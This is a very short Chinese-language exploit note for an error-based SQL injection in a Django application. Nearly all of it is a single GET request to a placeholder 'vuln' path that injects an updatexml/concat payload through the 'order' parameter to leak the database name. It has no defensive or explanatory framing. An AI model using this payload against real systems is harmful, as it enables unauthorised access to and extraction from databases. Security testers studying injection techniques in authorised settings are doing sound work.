前言Python的Django框架SQL注入漏洞利用 exp 在可以传递Get请求参数的地方进行SQL注入的报错注入 request1GET http://example.com/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23 完成
